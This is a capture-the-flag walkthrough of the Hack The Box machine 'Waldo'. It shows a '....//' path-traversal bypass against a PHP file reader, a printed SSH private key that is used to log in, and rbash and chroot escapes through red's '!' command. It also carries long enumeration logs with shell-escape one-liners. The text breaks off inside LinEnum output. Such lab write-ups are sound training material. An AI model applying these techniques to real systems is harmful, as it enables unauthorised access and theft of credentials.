Initial Enumeration
So we have a linux box with 2 open ports and a filtered port. Let’s check out the ports in turn:
22/OpenSSH 7.5p2
Not much use at this stage. No known exploits for it and no usernames to even brute force
80/HTTP nginx 1.12.2
Browsing to the site shows:
It’s a Where’s Waldo (that’s Where’s Wally to us Brits) themed site with a web app called List Manager. If you click Add List, a list is added and given the next number in the the sequence. And you can delete it with the Delete button.
Viewing the page source we can see it uses a Javascript function called list.js
and we can look at the code for that. Here is some of it:
I’m no Javascript expert but I can see some php files being called: fileWrite.php and fileDelete.php etc and a POST request is being used.
Time to fire up Burp Suite to intercept and analyse these requests. Using FoxyProxy to make switching traffic to Burp easy, turn on Intercept and try the Add List button:
As suspected that button sends a POST request using the fileWrite.php which is in the root web folder /. There are some parameters there in Body. We can specify the listnumber with the listnum parameter and even add data to it using the data parameter
If we click on one of the lists on the screen we see another php file called fileRead.php
To speed up this discovery process, I just try clicking every possible option, knowing that Burp will store the results in the Site Map:
Also worth noting here is that the dirRead.php refers to a directory: /.list
What do we know about this web app so far?:
In the root directory 10.10.10.84/ we have:
- list.html
- list.js
- dirRead.php
- fileDelete.php
- fileRead.php
- fileWrite.php
And there is a directory /.list/ which we don’t have permission to access. We can alter the parameters being sent to via the POST requests.
With Burp the easiest way of fiddling around with these things is to use the Repeater module which allows you to repeated send requests without having to re-write them each time and allows you to edit any part of them, go back to previous edits etc. In the HTTP History section of the proxy, we find each relevant request, right-click and select Send to Repeater.
Using Repeater I use the fileWrite.php function to create “list 99” just to see if I can, and add some arbitrary data to it. Then I see if I can see if I can find it using dirRead.php, which I can. I can also read the file itself using fileRead.php. Unfortunately writing php code into the list file doesn’t execute so no easy shell there. This is likely because I’m using a php function to read the file rather than GETting it which would trigger the PHP interpreter. The list files, including my “list99” are being stored in 10.10.10.87/.list which is not accessible by the browser or other GET request mechanisms. However all is not lost because whilst I cannot render PHP, that means I can read PHP source code and so let’s look at these files, starting with the fileRead.php itself:
The php source code is being mangled. I don’t know if there is an elegant way of sorting this out but I used Word’s find and replace function to replace the escape characters to swap these:
\n = newline
\t = tab
\” = ‘
\/ = /
and got this far:
<?php if($_SERVER['REQUEST_METHOD'] === ‘POST’) { $fileContent['file'] = false; header('Content-Type: application/json'); if(isset($_POST['file'])){ header('Content-Type: application/json'); $_POST['file'] = str_replace( array(‘../’, ‘..\’), ‘‘, $_POST['file']); if(strpos($_POST['file'], ‘user.txt’) === false){ $file = fopen(‘/var/www/html/’ . $_POST['file'], ‘r’); $fileContent['file'] = fread($file,filesize($_POST['file'])); fclose(); } } echo json_encode($fileContent); }
My PHP isn’t great so this could be wrong but it’s clear there is some filtering going on to stop you from just browsing for files easily. Straight away we can see that it’s not going to let you read the user.txt file! And then it looks like it’s deleting “../” and “..\” which is going to make the usual directory traversal techniques harder. Normally you just use ../ to go up in the directory tree but this will merely delete that. After messing around with it for a file I hit upon the idea of using ….// so that when the ../ is deleted, we’re left with ../ and this works find and I’m able to read the /etc/passwd file at …//…//…//etc/passwd
Note there is a user with a bin/sh login called “nobody”. Let’s check out his home folder. There are several files in there:
[".","..",".ash_history",".ssh",".viminfo","user.txt"]
We know we cannot read user.txt but in .ssh directory there are very interesting files, not least the .monitor file containing an private RSA key:
SSH allows authenticating via public/private key pairs instead of passwords. The private key is the one required by the ssh client so we should be able to use this to ssh in. However it looks a bit mangled so hopefully our find/replace system will work on this too. After running it through that I get:
-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl mR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f 87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS dGCc/gNpW/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN o8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8/6pceowqs9ujRkNzH9T1lJq4Fx1V vi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl/wdmuPEW6kU vmzhRU3gcjuzwBET0TNejbL/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR/6 pKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5 8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q 1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox/05qoOBL4kQxUM7 VxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS dVa3yLECgYEA7jk51MvUGSIFF6GkXsNb/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO v0og0X/iROXAcp6Z9WGpIc6FhVgJd/4bNlTR+A/lWQwFt1b6l03xdsyaIyIWi9xr xsb2sLNWP56A/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY qFfdAWrvVZjp26Yf/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI yzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1 /pAcw/+/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw/IMnLa3drm3CIAa32iU LRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ/ lnN2n1WyTIyEuGA/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp w7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9 1HLmBkDTjjj/xAJAZuiOF4Rs/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT rj1BhUCzZCUgQABtpC6vYj/HLLlzpiC05AIEhDdvToPK/0WuY64fds0VccAYmMDr X/PlAoGAS6UhbCm5TWZhtL/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2 DvVny8gKbM/OenwHnTlwRTEj5qdeAM40oj/mwCDc6kpV1lJXrW2R5mCH9zgbNFla W0iKCBUAm5xZgU/YskMsCBMNmA8A5ndRWGFEFE+VGDVPaRie0ro= -----END RSA PRIVATE KEY-----
That looks very much like a legit RSA key to. So now to paste that into a key file, set the permissions of the file to secure it (ssh requires this) and see if it works:
We’re in! Let’s grab the user.txt file to paste into the HTB system and move on.
In the .ssh folder there is an authorized_keys files containing a reference to a user called monitor:
This is confusing. I would assume that the nobody key is authorised (or how else did it work) and yet this file only has one key and it mentions “monitor@waldowalso. Weird. And why “@waldowaldo” when the machine is called “waldo”?
I’m going to check that this is the key we just used, just to be sure. The easiest way is to use the ssh keygen to generate a public key from the private key we have and see if it matches this one in the authorized_keys file:
root@kali:~/HTB/Waldo# ssh-keygen -y -e -f key ---- BEGIN SSH2 PUBLIC KEY ---- Comment: "2048-bit RSA, converted by root@kali from OpenSSH" AAAAB3NzaC1yc2EAAAADAQABAAABAQCzuzK0MT740dpYH17403dXm3UM/VNgdz7ijwPfra Xk3B/oKmWZHgkfqfg1xx2bVlT6oHvuWLxk6/KYG0gRjgWbTtfg+q3jN40F+opaQ5zJXVMt bp/zuzQVkGFgCLMas014suEHUhkiOkNUlRtJcbqzZzECV7XhyP6mcSJFOzIyKrWckJJ0YJ z+A2lb8AA0g3i9b0qyUuqIAQMl9yFjnmwInnXrZj34jXHOoXx71vXbBVeKu82jw8sacUlX DpIeGY8my572+MAh4f6f7leRtzz/qlx6jCqz26NGQ3Mf1PWUmrgXHVW+L3cNqrdtnd2Egh ZpZp+arOD6NJOFJY4jBHvf ---- END SSH2 PUBLIC KEY ---- root@kali:~/HTB/Waldo#
And of course it does. So WTF is monitor@waldowaldo about then?
Notice how when we ssh’d in, we got a “Welcome to Alpine Wiki” message?. Let’s run a privesc tool and see what else
waldo:/tmp$ python linuxprivchecker.py ================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29) [+] Hostname waldo [+] Operating System Welcome to Alpine Linux 3.6 Kernel \r on an \m (\l) [*] GETTING NETWORKING INFO... [+] Interfaces docker0 Link encap:Ethernet HWaddr 02:42:07:0A:99:80 inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) ens33 Link encap:Ethernet HWaddr 00:50:56:A4:A8:C1 inet addr:10.10.10.87 Bcast:10.10.10.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1143587 errors:0 dropped:102 overruns:0 frame:0 TX packets:965321 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:161520906 (154.0 MiB) TX bytes:201250810 (191.9 MiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:4416890 errors:0 dropped:0 overruns:0 frame:0 TX packets:4416890 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:560407680 (534.4 MiB) TX bytes:560407680 (534.4 MiB) [+] Netstat Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN - tcp 0 1152 10.10.10.87:8888 10.10.14.19:51932 ESTABLISHED - tcp 0 0 :::80 :::* LISTEN - tcp 0 0 :::22 :::* LISTEN - tcp 0 0 :::8888 :::* LISTEN - udp 0 0 10.10.10.87:35491 10.10.10.2:53 ESTABLISHED - [+] Route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33 10.10.10.0 * 255.255.255.0 U 0 0 0 ens33 169.254.0.0 * 255.255.0.0 U 1000 0 0 ens33 172.17.0.0 * 255.255.0.0 U 0 0 0 docker0 [*] GETTING FILESYSTEM INFO... [+] Mount results [+] fstab entries /dev/cdrom /media/cdrom iso9660 noauto,ro 0 0 /dev/usbdisk /media/usb vfat noauto,ro 0 0 [+] Scheduled cron jobs total 12 drwxr-xr-x 2 root root 4096 Jan 9 2018 . drwxr-xr-x 1 root root 4096 May 3 20:50 .. -rw------- 1 root root 283 Apr 24 2017 root [+] Writable cron dirs [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [+] Logged in User Activity [+] Super Users Found: root [+] Environment USER=nobody SSH_CLIENT=10.10.14.19 51932 8888 MAIL=/var/mail/nobody SHLVL=2 HOME=/home/nobody OLDPWD=/ SSH_TTY=/dev/pts/1 PAGER=less PS1=\h:\w\$ LOGNAME=nobody TERM=xterm-256color PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin SHELL=/bin/sh PWD=/tmp SSH_CONNECTION=10.10.14.19 51932 10.10.10.87 8888 CHARSET=UTF-8 [+] Root and current user history (depends on privs) lrwxrwxrwx 1 root root 9 Jul 24 11:57 /home/nobody/.ash_history -> /dev/null [+] Sudoers (privileged) [+] All users root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/bin/sh man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin postgres:x:70:70::/var/lib/postgresql:/bin/sh cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/home/nobody:/bin/sh nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin [+] Current User nobody [+] Current User ID uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root' drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/shm drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/mqueue drwxrwxrwt 2 root root 40 Sep 10 02:02 /sys/firmware drwxrwxrwt 1 root root 4096 Sep 12 10:06 /tmp [+] World Writeable Directories for Users other than Root [+] World Writable Files --w--w--w- 1 root root 0 Sep 10 02:02 /sys/fs/cgroup/memory/cgroup.event_control [+] Checking if root's home folder is accessible /root: total 0 [+] SUID/SGID Files and Directories -rwsr-xr-x 1 root root 41984 May 17 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 50016 May 17 2017 /usr/bin/chage -rwsr-xr-x 1 root root 18536 May 17 2017 /usr/bin/expiry -rwsr-xr-x 1 root root 41464 May 17 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 32256 May 17 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 31616 May 17 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 54744 May 17 2017 /usr/bin/gpasswd -rwxr-sr-x 1 root shadow 26328 May 16 2017 /sbin/unix_chkpwd [+] Logs containing keyword 'password' [+] Config files containing keyword 'password' [+] Shadow File (Privileged) [*] ENUMERATING PROCESSES AND APPLICATIONS... [+] Installed Packages [+] Current processes PID USER 1 root 7 root daemon off; 8 root 9 root 10 nginx 1142 root 1144 nobody 1145 nobody 1181 nobody 1263 nobody awk '{print $1,$2,$9,$10,$11}' 1264 nobody 1265 nobody [+] Apache Version and Modules [+] Apache Config File [+] Sudo Version (Check out https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo) [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER... 1 root 8 root 7 root daemon off; 1142 root 9 root [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING... [+] Installed Tools /usr/bin/awk /usr/bin/python /usr/bin/vi /usr/bin/vim /usr/bin/find /usr/bin/nc /usr/bin/wget /usr/bin/tftp [+] Related Shell Escape Sequences... vi--> :!bash vi--> :set shell=/bin/bash:shell vi--> :!bash vi--> :set shell=/bin/bash:shell awk--> awk 'BEGIN {system("/bin/bash")}' find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \; [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS... Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested! The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system - Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || https://www.exploit-db.com/exploits/5720 || Language=python - Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit || https://www.exploit-db.com/exploits/3384 || Language=c The following exploits are applicable to this kernel version and should be investigated as well - Kernel ia32syscall Emulation Privilege Escalation || https://www.exploit-db.com/exploits/15023 || Language=c - Sendpage Local Privilege Escalation || https://www.exploit-db.com/exploits/19933 || Language=ruby** - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || https://www.exploit-db.com/exploits/15944 || Language=c - CAP_SYS_ADMIN to root Exploit || https://www.exploit-db.com/exploits/15916 || Language=c - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c - open-time Capability file_ns_capable() Privilege Escalation || https://www.exploit-db.com/exploits/25450 || Language=c - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/25307 || Language=c Finished ================================================================================================= waldo:/tmp$
That is an oddly minimal output compared to the usual ones.
There are q few hidden files and a directory in nobody’s home folder:
The user.txt token is there and readable so Step 1 accomplished.
In the .ssh folder:
And let’s check out the .viminfo file. There’s quite a lot on it and most of it centres around changes made to the following files: ~/rootkey and dev/shm/id_rsa – neither of which appear to exist anymore.
The .monitor file is a private RSA key file. It is not the same one we used to ssh in as the user nobody:
At this point I got caught up in trying to work out why root’s shell was /bin/ash and not /bin/bash which led me to finding out we were on some sort of BusyBox machine etc when I should have seen what was in front of me: if you’ve been given something as valuable as a private SSH key and user name (“monitor” then you sure as hell ought to try at least using them. The problem is I’d made the mistake of looking at some hints on the HTB forum which totally misled me and I ended up wasting hours chasing irrelevant nonsense. Sometimes a little (cryptic) knowledge is a dangerous thing.
So using the .monitor key, just as before we find Waldo:
The monitor user is even more restricted than then nobody and appears to be in a chroot “jail”. Files from hi home directory:
As you can see, he has very limited commands available but does have PATH set up for the app-dev folder files:
Escaping rbash Jail
Just 4 commands available: ls, most, red and rnano. These are symbolic links to the files in the root system outside of our chroot jail. The commands:
- ls is just the normal ls
- most is another output paging thing like more or less
- red is a restricted form of ed, which is a line-based text editor, apparently
- rnano is a restricted form of nano, the popular linux editor.
Interestingly though, the symlinks of red and rnano actually go to their unrestricted counterparts which might be relevant.
Maybe we can use this fact to browse or otherwise edit items outside of the chroot jail? I tried opening a file in nano using Ctrl-R but got an error saying it was not allowed in restricted mode, so maybe my theory isn’t sound? I don’t know the first thing about red/ed so will have to google that. First page I found was: https://www.tutorialspoint.com/unix_commands/ed.htm
First thing I tried was to give my ed session a prompt “red:” – just to amuse myself and so it was clear that ed command worked:
According to that guide you can specify a file to edit but if you prefix it with a bang ! then it will be interpreted as a shell command and so the obvious move is to open a shell outside of the chroot jail and thus escape it, and this works perfectly:
Now for a bit of enumeration:
monitor@waldo:/tmp$ LinEnum.sh ########################################################## Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # [-] Debug Info [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!) Scan started at: Thu Sep 13 09:38:53 EDT 2018 ### SYSTEM ############################################## [-] Kernel information: Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29) [-] Specific release information: PRETTY_NAME="Debian GNU/Linux 9 (stretch)" NAME="Debian GNU/Linux" VERSION_ID="9" VERSION="9 (stretch)" ID=debian HOME_URL="https://www.debian.org/" SUPPORT_URL="https://www.debian.org/support" BUG_REPORT_URL="https://bugs.debian.org/" [-] Hostname: waldo ### USER/GROUP ########################################## [-] Current user/group info: uid=1001(monitor) gid=1001(monitor) groups=1001(monitor) [-] Who else is logged on: 09:38:53 up 5:34, 1 user, load average: 0.13, 0.03, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT monitor pts/0 127.0.0.1 06:27 4.00s 6.28s 0.00s /bin/bash /tmp/LinEnum.sh [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network) uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(avahi-autoipd) gid=109(avahi-autoipd) groups=109(avahi-autoipd) uid=106(messagebus) gid=110(messagebus) groups=110(messagebus) uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=1000(steve) gid=1000(steve) groups=1000(steve),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth) uid=1001(monitor) gid=1001(monitor) groups=1001(monitor) uid=1002(app-dev) gid=1002(app-dev) groups=1002(app-dev) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false avahi-autoipd:x:105:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false sshd:x:107:65534::/run/sshd:/usr/sbin/nologin steve:x:1000:1000:steve,,,:/home/steve:/bin/bash monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash app-dev:x:1002:1002:User for managing app-dev,,,:/home/app-dev:/bin/bash [-] Super user account(s): root [-] Are permissions on /home directories lax: total 20K drwxr-xr-x 5 root root 4.0K May 3 16:50 . drwxr-xr-x 22 root root 4.0K May 1 23:04 .. drwxr-xr-x 2 app-dev app-dev 4.0K May 3 16:50 app-dev drwxr-x--- 5 root monitor 4.0K Jul 24 07:58 monitor drwxr-xr-x 2 steve steve 4.0K May 1 23:30 steve ### ENVIRONMENTAL ####################################### [-] Environment information: SSH_CONNECTION=127.0.0.1 35820 127.0.1.1 22 LANG=en_US.UTF-8 OLDPWD=/home/monitor XDG_SESSION_ID=11 USER=monitor PWD=/tmp HOME=/home/monitor SSH_CLIENT=127.0.0.1 35820 22 SSH_TTY=/dev/pts/0 MAIL=/var/mail/monitor TERM=xterm-256color SHELL=/bin/rbash SHLVL=3 LOGNAME=monitor XDG_RUNTIME_DIR=/run/user/1001 PATH=PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/ _=/usr/bin/env [-] Path information: PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/ [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash [-] Current umask value: 0111 u=rw,g=rw,o=rw [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab /etc/cron.d: total 16 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rw-r--r-- 1 root root 285 May 29 2017 anacron -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.daily: total 40 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rwxr-xr-x 1 root root 311 May 29 2017 0anacron -rwxr-xr-x 1 root root 1474 Sep 13 2017 apt-compat -rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils -rwxr-xr-x 1 root root 1597 Feb 22 2017 dpkg -rwxr-xr-x 1 root root 89 May 5 2015 logrotate -rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db -rwxr-xr-x 1 root root 249 May 17 2017 passwd -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 May 1 23:03 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.monthly: total 16 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rwxr-xr-x 1 root root 313 May 29 2017 0anacron -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 May 1 23:26 . drwxr-xr-x 80 root root 4096 Jul 24 05:50 .. -rwxr-xr-x 1 root root 312 May 29 2017 0anacron -rwxr-xr-x 1 root root 723 Dec 13 2016 man-db -rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Anacron jobs and associated file permissions: -rw-r--r-- 1 root root 401 May 29 2017 /etc/anacrontab # /etc/anacrontab: configuration file for anacron # See anacron(8) and anacrontab(5) for details. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin HOME=/root LOGNAME=root # These replace cron's entries 1 5 cron.daily run-parts --report /etc/cron.daily 7 10 cron.weekly run-parts --report /etc/cron.weekly @monthly 15 cron.monthly run-parts --report /etc/cron.monthly [-] When were jobs last executed (/var/spool/anacron contents): total 20 drwxr-xr-x 2 root root 4096 May 3 16:44 . drwxr-xr-x 5 root root 4096 May 1 23:25 .. -rw------- 1 root root 9 Sep 13 04:09 cron.daily -rw------- 1 root root 9 Sep 13 04:19 cron.monthly -rw------- 1 root root 9 Sep 13 04:14 cron.weekly ### NETWORKING ########################################## [-] Network and IP info: 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 00:50:56:a4:80:14 brd ff:ff:ff:ff:ff:ff inet 10.10.10.87/24 brd 10.10.10.255 scope global ens33 valid_lft forever preferred_lft forever 3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default link/ether 02:42:a6:3e:f0:61 brd ff:ff:ff:ff:ff:ff inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0 